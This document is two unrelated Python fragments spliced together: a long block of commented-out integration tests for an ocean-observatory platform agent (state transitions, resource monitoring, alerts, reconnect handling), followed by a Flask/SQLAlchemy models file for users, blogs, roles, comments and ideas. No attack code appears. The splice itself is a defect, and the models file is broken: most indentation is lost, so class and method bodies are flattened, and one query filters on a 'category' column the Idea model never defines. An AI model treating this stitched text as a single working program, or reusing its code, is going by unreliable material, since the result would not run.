# log.info("%r: setting attributes=%s", self.PLATFORM_ID, attrs)
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.SET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attrName in attrNames:
# if attrName in writ_attrNames:
# self._verify_valid_attribute_id(attrName, attr_values)
# else:
# self._verify_not_writable_attribute_id(attrName, attr_values)
#
# # try invalid settings:
#
# # set invalid values to writable attributes:
# attrs = [(attrName, self.INVALID_ATTR_VALUE) for attrName in writ_attrNames]
# log.info("%r: setting attributes=%s", self.PLATFORM_ID, attrs)
# kwargs = dict(attrs=attrs)
# cmd = AgentCommand(command=PlatformAgentEvent.SET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# attr_values = retval.result
# self.assertIsInstance(attr_values, dict)
# for attrName in writ_attrNames:
# self._verify_attribute_value_out_of_range(attrName, attr_values)
#
# def _get_subplatform_ids(self):
# kwargs = dict(subplatform_ids=None)
# cmd = AgentCommand(command=PlatformAgentEvent.GET_RESOURCE, kwargs=kwargs)
# retval = self._execute_agent(cmd)
# subplatform_ids = retval.result
# self.assertIsInstance(subplatform_ids, (list, tuple))
# return subplatform_ids
#
# def test_capabilities(self):
# self._create_network_and_start_root_platform()
#
# agt_cmds_all = [
# PlatformAgentEvent.INITIALIZE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_ACTIVE,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RUN,
#
# PlatformAgentEvent.CLEAR,
# PlatformAgentEvent.PAUSE,
# PlatformAgentEvent.RESUME,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.START_MONITORING,
# PlatformAgentEvent.STOP_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
# PlatformAgentEvent.ABORT_MISSION,
# PlatformAgentEvent.KILL_MISSION,
# ]
#
# def sort_caps(caps_list):
# agt_cmds = []
# agt_pars = []
# res_cmds = []
# res_iface = []
# res_pars = []
#
# if len(caps_list)>0 and isinstance(caps_list[0], AgentCapability):
# agt_cmds = [x.name for x in caps_list if x.cap_type==CapabilityType.AGT_CMD]
# agt_pars = [x.name for x in caps_list if x.cap_type==CapabilityType.AGT_PAR]
# res_cmds = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_CMD]
# res_iface = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_IFACE]
# res_pars = [x.name for x in caps_list if x.cap_type==CapabilityType.RES_PAR]
#
# elif len(caps_list)>0 and isinstance(caps_list[0], dict):
# agt_cmds = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.AGT_CMD]
# agt_pars = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.AGT_PAR]
# res_cmds = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_CMD]
# res_iface = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_IFACE]
# res_pars = [x['name'] for x in caps_list if x['cap_type']==CapabilityType.RES_PAR]
#
# state = self._pa_client.get_agent_state()
# log.debug("sort_caps: in agent state=%s\n"
# "agt_cmds => %s\n"
# "agt_pars => %s\n"
# "res_cmds => %s\n"
# "res_iface => %s\n"
# "res_pars => %s\n",
# state, agt_cmds, agt_pars, res_cmds, res_iface, res_pars)
#
# return agt_cmds, agt_pars, res_cmds, res_iface, res_pars
#
# def verify_schema(caps_list):
#
# dd_list = ['display_name','description']
# ddt_list = ['display_name','description','type']
# ddvt_list = ['display_name','description','visibility','type']
# ddak_list = ['display_name','description','args','kwargs']
# kkvt_res_list = ['display_name', 'description', 'visibility',
# 'type, monitor_cycle_seconds', 'precision',
# 'min_val', 'max_val', 'units', 'group']
# stream_list = ['tdb', 'tdbtdb']
#
# for x in caps_list:
# if isinstance(x,dict):
# x.pop('type_')
# x = IonObject('AgentCapability', **x)
#
# try:
# if x.cap_type == CapabilityType.AGT_CMD:
# if x['name'] == 'example':
# pass
# keys = x.schema.keys()
# for y in ddak_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_PAR:
# if x.name != 'example':
# keys = x.schema.keys()
# for y in ddvt_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.RES_CMD:
# keys = x.schema.keys()
# for y in ddak_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.RES_IFACE:
# pass
#
# elif x.cap_type == CapabilityType.RES_PAR:
# pass
# #keys = x.schema.keys()
# #for y in kkvt_res_list:
# # self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_STATES:
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in dd_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.ALERT_DEFS:
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in ddt_list:
# self.assertIn(y, keys)
#
# elif x.cap_type == CapabilityType.AGT_CMD_ARGS:
# pass
# """
# for (k,v) in x.schema.iteritems():
# keys = v.keys()
# for y in ddt_list:
# self.assertIn(y, keys)
# """
#
# elif x.cap_type == CapabilityType.AGT_STREAMS:
# pass
# #keys = x.schema.keys()
# #for y in stream_list:
# # self.assertIn(y, keys)
#
# except Exception:
# print '### ERROR verifying schema for'
# print x['name']
# raise
#
# agt_pars_all = [
# 'example',
# 'child_agg_status',
# 'alerts',
# 'aggstatus',
# 'rollup_status',
# ]
# res_pars_all = []
# res_cmds_all = [
# RSNPlatformDriverEvent.CONNECT_INSTRUMENT,
# RSNPlatformDriverEvent.DISCONNECT_INSTRUMENT,
# RSNPlatformDriverEvent.TURN_ON_PORT,
# RSNPlatformDriverEvent.TURN_OFF_PORT,
# # RSNPlatformDriverEvent.CHECK_SYNC #OOIION-1623 Remove until Check Sync requirements fully defined
# ]
#
# ##################################################################
# # UNINITIALIZED
# ##################################################################
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state UNINITIALIZED.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_uninitialized = [
# PlatformAgentEvent.INITIALIZE,
# PlatformAgentEvent.SHUTDOWN,
# ]
# self.assertItemsEqual(agt_cmds, agt_cmds_uninitialized)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states.
# retval = self._pa_client.get_capabilities(current_state=False)
#
# # Validate all capabilities as read from state UNINITIALIZED.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# ##################################################################
# # INACTIVE
# ##################################################################
# self._initialize()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state INACTIVE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_inactive = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_ACTIVE,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_inactive)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state INACTIVE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# print '############### resource params'
# for x in res_pars:
# print str(x)
#
# ##################################################################
# # IDLE
# ##################################################################
# self._go_active()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities for state IDLE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_idle = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RUN,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_idle)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# # Get exposed capabilities in all states as read from IDLE.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state IDLE.
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, [])
#
# verify_schema(retval)
#
# ##################################################################
# # COMMAND
# ##################################################################
# self._run()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state COMMAND
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_command = [
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# PlatformAgentEvent.PAUSE,
# PlatformAgentEvent.CLEAR,
#
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.START_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_command)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# ##################################################################
# # STOPPED
# ##################################################################
# self._pause()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state STOPPED
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_stopped = [
# PlatformAgentEvent.RESUME,
# PlatformAgentEvent.CLEAR,
# PlatformAgentEvent.GO_INACTIVE,
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_stopped)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, [])
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# # back to COMMAND:
# self._resume()
#
# ##################################################################
# # MONITORING
# ##################################################################
# self._start_resource_monitoring()
#
# # Get exposed capabilities in current state.
# retval = self._pa_client.get_capabilities()
#
# # Validate capabilities of state MONITORING
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# agt_cmds_monitoring = [
# PlatformAgentEvent.RESET,
# PlatformAgentEvent.SHUTDOWN,
#
# #PlatformAgentEvent.GET_RESOURCE_CAPABILITIES,
# #PlatformAgentEvent.PING_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE,
# #PlatformAgentEvent.SET_RESOURCE,
# #PlatformAgentEvent.EXECUTE_RESOURCE,
# #PlatformAgentEvent.GET_RESOURCE_STATE,
#
# PlatformAgentEvent.STOP_MONITORING,
#
# PlatformAgentEvent.RUN_MISSION,
#
# ]
#
# self.assertItemsEqual(agt_cmds, agt_cmds_monitoring)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# # return to COMMAND state:
# self._stop_resource_monitoring()
#
#
# ###################
# # ALL CAPABILITIES
# ###################
#
# # Get exposed capabilities in all states as read from state COMMAND.
# retval = self._pa_client.get_capabilities(False)
#
# # Validate all capabilities as read from state COMMAND
# agt_cmds, agt_pars, res_cmds, res_iface, res_pars = sort_caps(retval)
#
# self.assertItemsEqual(agt_cmds, agt_cmds_all)
# self.assertItemsEqual(agt_pars, agt_pars_all)
# self.assertItemsEqual(res_cmds, res_cmds_all)
# #self.assertItemsEqual(res_pars, res_pars_all)
#
# verify_schema(retval)
#
# def test_some_state_transitions(self):
# self._create_network_and_start_root_platform(self._shutdown)
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# self._initialize() # -> INACTIVE
# self._reset() # -> UNINITIALIZED
#
# self._initialize() # -> INACTIVE
# self._go_active() # -> IDLE
# self._reset() # -> UNINITIALIZED
#
# self._initialize() # -> INACTIVE
# self._go_active() # -> IDLE
# self._run() # -> COMMAND
# self._pause() # -> STOPPED
# self._resume() # -> COMMAND
# self._clear() # -> IDLE
# self._reset() # -> UNINITIALIZED
#
# def test_get_set_resources(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._get_resource()
# self._set_resource()
#
# def test_some_commands(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._ping_agent()
# self._ping_resource()
#
# self._get_metadata()
# self._get_subplatform_ids()
#
# ports = self._get_ports()
# for port_id in ports:
# self._get_connected_instruments(port_id)
#
# def test_resource_monitoring(self):
# #
# # Basic test for resource monitoring: starts monitoring, waits for
# # a sample to be published, and stops resource monitoring.
# #
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._start_resource_monitoring()
# try:
# self._wait_for_a_data_sample()
# finally:
# self._stop_resource_monitoring()
#
# def test_resource_monitoring_recent(self):
# #
# # https://jira.oceanobservatories.org/tasks/browse/OOIION-1372
# #
# # Verifies that the requests for attribute values are always for
# # the most recent ones, meaning that the retrieved values should *not*
# # be older than a small multiple of the nominal monitoring rate, even
# # after a long period in non-monitoring state.
# # See ResourceMonitor._retrieve_attribute_values
# #
#
# # start this test as in test_resource_monitoring()
# self.test_resource_monitoring()
# # which completes right after stopping monitoring. We want that initial
# # start/stop-monitoring phase to make this test more comprehensive.
# self._assert_state(PlatformAgentState.COMMAND)
#
# # now, the rest of this test does the following:
# # - pick an attribute to use as a basis for the time parameters to
# # be used in the test
# # - wait for a while in the current non-monitoring mode
# # - re-enable monitoring
# # - wait for a sample to be published
# # - verify that new received data sample is "recent"
# # - stop monitoring
#
# # first, use an attribute (from the root platform being tested) with
# # a minimal monitoring rate, since that attribute should be reported
# # in a first sample received after re-enabling the monitoring.
# attr = None
# for attr_id, plat_attr in self._platform_attributes[self.PLATFORM_ID].iteritems():
# if attr is None or \
# float(plat_attr['monitor_cycle_seconds']) < float(attr['monitor_cycle_seconds']):
# attr = plat_attr
#
# self.assertIsNotNone(attr,
# "some attribute expected to be defined for %r to "
# "actually proceed with this test" % self.PLATFORM_ID)
#
# attr_id = attr['attr_id']
# monitor_cycle_seconds = attr['monitor_cycle_seconds']
# log.info("test_resource_monitoring_recent: using attr_id=%r: monitor_cycle_seconds=%s",
# attr_id, monitor_cycle_seconds)
#
# # sleep for twice the interval defining "recent":
# from ion.agents.platform.resource_monitor import _MULT_INTERVAL
# time_to_sleep = 2 * (_MULT_INTERVAL * monitor_cycle_seconds)
# log.info("test_resource_monitoring_recent: sleeping for %s secs "
# "before resuming monitoring", time_to_sleep)
# sleep(time_to_sleep)
#
# # reset the variables associated with the _wait_for_a_data_sample call below:
# self._samples_received = []
# self._async_data_result = AsyncResult()
#
# #################################################
# # re-start monitoring and wait for new sample:
# log.info("test_resource_monitoring_recent: re-starting monitoring")
# self._start_resource_monitoring(recursion=False)
# # should also work with recursion to children but set recursion=False
# # to avoid wasting the extra time in this test.
#
# try:
# self._wait_for_a_data_sample()
#
# # get current time here (right after receiving sample) for comparison below:
# curr_time_millis = current_time_millis()
#
# # verify that the timestamp of the received sample is not too old.
# # For this, use the minimum of the reported timestamps:
# rdt = RecordDictionaryTool.load_from_granule(self._samples_received[0])
# log.trace("test_resource_monitoring_recent: rdt:\n%s", rdt.pretty_print())
# temporal_parameter_name = rdt.temporal_parameter
# times = rdt[temporal_parameter_name]
# log.trace("test_resource_monitoring_recent: times:\n%s", self._pp.pformat(times))
#
# # minimum reported timestamp (note the NTP -> ION_time conversion):
# min_reported_time_ntp = min(times)
# min_reported_time_millis = float(ntp_2_ion_ts(min_reported_time_ntp))
# log.info("test_resource_monitoring_recent: sample received, min_reported_time_millis=%s",
# int(min_reported_time_millis))
#
# # finally verify that it is actually not older than the small multiple
# # of monitor_cycle_seconds plus some additional tolerance (which is
# # arbitrarily set here to 10 secs):
# lower_limit_millis = \
# curr_time_millis - 1000 * (_MULT_INTERVAL * monitor_cycle_seconds + 10)
#
# self.assertGreaterEqual(
# min_reported_time_millis, lower_limit_millis,
# "min_reported_time_millis=%s must be >= %s. Diff=%s millis" % (
# min_reported_time_millis, lower_limit_millis,
# min_reported_time_millis - lower_limit_millis))
#
# finally:
# self._stop_resource_monitoring(recursion=False)
#
# def test_external_event_dispatch(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
#
# # according to process_oms_event() (in service_gateway_service.py)
# # https://github.com/ooici/coi-services/blob/999c4315259082a9e50d6f4f96f8dd606073fda8/ion/services/coi/service_gateway_service.py#L339-370
# async_event_result, events_received = self._start_event_subscriber2(
# count=1,
# event_type="OMSDeviceStatusEvent",
# origin_type='OMS Platform'
# )
#
# self._go_active()
# self._run()
#
# # verify reception of the external event:
# log.info("waiting for external event notification... (timeout=%s)", self._receive_timeout)
# async_event_result.get(timeout=self._receive_timeout)
# self.assertEquals(len(events_received), 1)
# log.info("external events received: (%d): %s", len(events_received), events_received)
#
# def test_connect_disconnect_instrument(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._connect_instrument()
# self._turn_on_port()
#
# self._turn_off_port()
# self._disconnect_instrument()
#
# def test_check_sync(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._check_sync()
#
# self._connect_instrument()
# self._check_sync()
#
# self._disconnect_instrument()
# self._check_sync()
#
# def test_execute_resource(self):
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# self._initialize()
# self._go_active()
# self._run()
#
# self._execute_resource(RSNPlatformDriverEvent.CHECK_SYNC)
#
# def test_resource_states(self):
# self._create_network_and_start_root_platform(self._shutdown)
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
#
# with self.assertRaises(Conflict):
# self._pa_client.get_resource_state()
#
# self._initialize()
#
# self._start_event_subscriber(event_type="ResourceAgentResourceStateEvent",
# count=2)
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.DISCONNECTED)
#
# self._go_active()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.CONNECTED)
#
# self._run()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.CONNECTED)
#
# self._go_inactive()
#
# res_state = self._pa_client.get_resource_state()
# self.assertEqual(res_state, RSNPlatformDriverState.DISCONNECTED)
#
# self._reset()
#
# with self.assertRaises(Conflict):
# self._pa_client.get_resource_state()
#
# self._async_event_result.get(timeout=self._receive_timeout)
# self.assertGreaterEqual(len(self._events_received), 2)
#
# def test_lost_connection_and_reconnect(self):
# #
# # Starts up the network and puts the root platform in the MONITORING
# # state; then makes the simulator generate synthetic exceptions for
# # any call, which are handled by the driver as "connection lost"
# # situations; then it verifies the publication of the associated event
# # from the agent, and the LOST_CONNECTION state for the agent.
# # Finally, it instructs the simulator to resume working normally,
# # which should make the reconnect logic in the agent to recover the
# # connection and go back to the state where it was at connection lost.
# #
#
# ######################################################
# # set up network and put root in MONITORING state
#
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._initialize()
#
# async_event_result, events_received = self._start_event_subscriber2(
# count=1,
# event_type="ResourceAgentConnectionLostErrorEvent",
# origin=self.p_root.platform_device_id)
#
# self._go_active()
# self._run()
#
# self._start_resource_monitoring()
#
# # let normal activity go on for a while:
# sleep(15)
#
# ######################################################
# # disable simulator to trigger lost connection:
# log.debug("disabling simulator")
# self._simulator_disable()
#
# # verify a ResourceAgentConnectionLostErrorEvent was published:
# async_event_result.get(timeout=self._receive_timeout)
# self.assertEquals(len(events_received), 1)
#
# # verify the platform is now in LOST_CONNECTION:
# self._assert_state(PlatformAgentState.LOST_CONNECTION)
#
# ######################################################
# # reconnect phase
#
# # re-enable simulator so connection is re-established:
# log.debug("re-enabling simulator")
# self._simulator_enable()
#
# # wait for a bit for the reconnection to take effect:
# sleep(15)
#
# # verify the platform is now back in MONITORING
# self._assert_state(PlatformAgentState.MONITORING)
#
# self._stop_resource_monitoring()
#
# def test_alerts(self):
# #
# # Tests alert processing/publication from the platform agent. Both
# # alert definitions passed via configuration and alert definitions
# # passed via the agent's set_agent({'alerts' : alert_defs}) method
# # are tested.
# #
#
# def start_DeviceStatusAlertEvent_subscriber(value_id, sub_type):
# """
# @return async_event_result Use it to wait for the expected event
# """
# event_type = "DeviceStatusAlertEvent"
#
# async_event_result = AsyncResult()
#
# def consume_event(evt, *args, **kwargs):
# log.info('DeviceStatusAlertEvent_subscriber received evt: %s', str(evt))
# if evt.type_ != event_type or \
# evt.value_id != value_id or \
# evt.sub_type != sub_type:
# return
#
# async_event_result.set(evt)
#
# kwargs = dict(event_type=event_type,
# callback=consume_event,
# origin=self.p_root.platform_device_id,
# sub_type=sub_type)
#
# sub = EventSubscriber(**kwargs)
# sub.start()
# log.info("registered DeviceStatusAlertEvent subscriber: %s", kwargs)
#
# self._event_subscribers.append(sub)
# sub._ready_event.wait(timeout=self._receive_timeout)
#
# return async_event_result
#
# # before the creation of the network, set some alert defs for the
# # configuration of the root platform we are testing:
# alerts_for_config = [
# {
# 'name' : 'input_bus_current_warning_interval',
# 'stream_name' : 'parsed',
# 'value_id' : 'input_bus_current',
# 'description' : 'input_bus_current is above normal range.',
# 'alert_type' : StreamAlertType.WARNING,
# 'aggregate_type' : AggregateStatusType.AGGREGATE_DATA,
# 'lower_bound' : None,
# 'lower_rel_op' : None,
# 'upper_bound' : 200.0,
# 'upper_rel_op' : '<',
# 'alert_class' : 'IntervalAlert'
# }]
# self._set_additional_extra_fields_for_platform_configuration(
# self.PLATFORM_ID, {'alerts': alerts_for_config})
#
# self._create_network_and_start_root_platform()
#
# self._assert_state(PlatformAgentState.UNINITIALIZED)
# self._ping_agent()
#
# self._initialize()
#
# # verify we get reported the configured alerts:
# configed_alerts = self._pa_client.get_agent(['alerts'])['alerts']
# self.assertEquals(len(alerts_for_config), len(configed_alerts),
# "must have %d alerts defined from configuration but got %d" % (
# len(alerts_for_config), len(configed_alerts)))
#
# # define some additional alerts:
# # NOTE: see ion/agents/platform/rsn/simulator/oms_values.py for the
# # sinusoidal waveforms that are generated; here we depend on those
# # ranges to indicate the upper_bounds for these alarms; for example,
# # input_voltage fluctuates within -500.0 to +500, so we specify
# # upper_bound = 400.0 to see the alert being published.
# new_alert_defs = [
# {
# 'name' : 'input_voltage_warning_interval',
# 'stream_name' : 'parsed',
# 'value_id' : 'input_voltage',
# 'description' : 'input_voltage is above normal range.',
# 'alert_type' : StreamAlertType.WARNING,
# 'aggregate_type' : AggregateStatusType.AGGREGATE_DATA,
# 'lower_bound' : None,
# 'lower_rel_op' : None,
# 'upper_bound' : 400.0,
# 'upper_rel_op' : '<',
# 'alert_class' : 'IntervalAlert'
# }]
#
# # All the alerts to be set: the configured ones plus the new ones above:
# alert_defs = configed_alerts + new_alert_defs
#
# self._pa_client.set_agent({'alerts' : alert_defs})
#
# retval = self._pa_client.get_agent(['alerts'])['alerts']
# log.debug('alerts: %s', self._pp.pformat(retval))
# self.assertEquals(len(alert_defs), len(retval),
# "must have %d alerts defined here but got %d" % (
# len(alert_defs), len(retval)))
#
# self._go_active()
# self._run()
#
# #################################################################
# # prepare to receive alert publications:
# # note: as the values for the above streams fluctuate we should get
# # both WARNING and ALL_CLEAR events:
#
# # NOTE that the verifications below are for both the configured
# # alerts and the additional alerts set via set_agent.
#
# async_event_result1 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_voltage",
# sub_type=StreamAlertType._str_map[StreamAlertType.WARNING])
#
# async_event_result2 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_bus_current",
# sub_type=StreamAlertType._str_map[StreamAlertType.WARNING])
#
# async_event_result3 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_voltage",
# sub_type=StreamAlertType._str_map[StreamAlertType.ALL_CLEAR])
#
# async_event_result4 = start_DeviceStatusAlertEvent_subscriber(
# value_id="input_bus_current",
# sub_type=StreamAlertType._str_map[StreamAlertType.ALL_CLEAR])
#
# self._start_resource_monitoring()
#
# # wait for the expected DeviceStatusAlertEvent events:
# # (60sec timeout enough for the sine periods associated to the streams)
# async_event_result1.get(timeout=60)
# async_event_result2.get(timeout=60)
# async_event_result3.get(timeout=60)
# async_event_result4.get(timeout=60)
#
# self._stop_resource_monitoring()
|
from . import db
from werkzeug.security import generate_password_hash,check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer,primary_key = True)
username = db.Column(db.String(255),index = True)
email = db.Column(db.String(255),unique = True,index = True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
bio = db.Column(db.String(255))
profile_pic_path = db.Column(db.String())
password_secure = db.Column(db.String(255))
idea = db.relationship('Comments', backref='author', lazy='dynamic')
def __repr__(self):
return f'User {self.username}'
@property
def password(self):
raise AttributeError('You cannot read the password attribute')
@password.setter
def password(self, password):
        self.password_secure = generate_password_hash(password)
    def verify_password(self,password):
        return check_password_hash(self.password_secure,password)
class Blog(UserMixin,db.Model):
__tablename__ = 'blogs'
id = db.Column(db.Integer,primary_key = True)
blog_name = db.Column(db.String(255),index = True)
# blog_email = db.Column(db.String(255),unique = True,index = True)
role_id = db.Column(db.Integer,db.ForeignKey('roles.id'))
description = db.Column(db.String(255), index=True)
idea_title = db.Column(db.String(255), index=True)
# bio = db.Column(db.String(255))
# profile_pic_path = db.Column(db.String())
# blog_pass_secure = db.Column(db.String(255))
# @property
# def password(self):
# raise AttributeError('You cannot read the password attribute')
# @password.setter
# def password(self, password):
# self.blog_pass_secure = generate_password_hash(password)
# def verify_password(self,password):
# return check_password_hash(self.blog_pass_secure,password)
def __repr__(self):
        return f'Blog {self.blog_name}'
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer,primary_key = True)
name = db.Column(db.String(255))
users = db.relationship('User',backref = 'role',lazy="dynamic")
def __repr__(self):
        return f'Role {self.name}'
class Comments(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer,primary_key = True)
comment = db.Column(db.String(255))
idea_id = db.Column(db.Integer, db.ForeignKey("idea.id"))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer,db.ForeignKey("users.id"))
def save_comment(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_comment(cls,id):
comments = Comments.query.filter_by(idea_id=id).all()
return comments
def delete(self):
db.session.delete(self)
db.session.commit()
def __repr__(self):
return f"Comments('{self.comment}', '{self.date}')"
class Idea(db.Model):
__tablename__= 'idea'
id = db.Column(db.Integer,primary_key = True)
title = db.Column(db.String(255))
description = db.Column(db.String(255))
idea = db.Column(db.String(255))
date = db.Column(db.DateTime(250), default=datetime.utcnow)
user_id = db.Column(db.Integer, db.ForeignKey("users.id"))
comments = db.relationship('Comments', backref='title', lazy='dynamic')
def save_idea(self):
db.session.add(self)
db.session.commit()
@classmethod
def get_idea(cls,cate):
        idea = cls.query.filter_by(category=cate).all()
return idea
@classmethod
def get_all_idea(cls):
        idea = Idea.query.order_by(Idea.id.desc()).all()
return idea
def __repr__(self):
        return f'Idea {self.title}'
